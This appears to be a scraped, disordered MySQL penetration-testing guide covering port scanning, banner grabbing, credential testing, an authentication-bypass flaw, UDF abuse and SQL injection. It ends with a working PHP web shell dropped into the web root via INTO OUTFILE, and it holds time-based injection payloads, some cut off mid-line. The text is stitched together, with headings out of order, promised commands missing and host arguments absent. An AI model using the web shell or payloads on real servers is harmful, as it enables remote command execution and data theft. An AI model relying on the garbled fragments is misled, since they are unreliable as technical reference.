If default credentials do not work, the next phase involves auditing password strength. MySQL uses its own authentication handshake protocol, so tooling that speaks that protocol is necessary.
Metasploit Auxiliary Modules
Prevent remote exposure by ensuring bind-address = 127.0.0.1 is set in the my.cnf configuration file. Use SSH tunneling if remote administration is required.
It frequently links to and explains the use of industry-standard tools like sqlmap for automated testing.
MySQL traditionally listens on TCP port 3306. However, some environments host it on a non-standard port. A standard Nmap service scan is the quickest way to confirm the service footprint:
nmap -sV -sC -p 3306
Using MySQL's capability to write binary data to the file system to gain Remote Code Execution.
If the port is open, you can manually grab the MySQL handshake banner using netcat or telnet. This often reveals the exact sub-version (e.g., 8.0.25-0ubuntu0.20.04.1), giving you immediate insight into which published CVEs may apply to that build.
nc -nv 3306
Nmap NSE Scripts
In specific legacy versions of MySQL (and MariaDB), a flaw in the library routine checking the authentication token returned by the client allowed users to authenticate without the correct password. Each repeated authentication attempt has roughly a 1-in-256 chance that the check passes. You can verify this vulnerability using a rapid bash loop:
Maliciously loaded UDFs (user-defined functions) can be used to execute OS-level commands if the MySQL plugin directory is writable by the database process.
You can drop a web shell or a malicious payload onto the server using INTO OUTFILE or INTO DUMPFILE.
In certain conditions, you might need to write binary data to the file system. HackTricks provides direct methods for this using conversion functions:
Use auxiliary/scanner/mysql/mysql_login to validate existing credentials.
' AND (SELECT 1 FROM dual W
' PAGE.php?id=1 AND SLEEP(5)-- -
4. File System Interactivity
-- Write a PHP webshell (if secure_file_priv permits)
SELECT "<?php system($_GET['cmd']); ?>" INTO OUTFILE '/var/www/html/shell.php';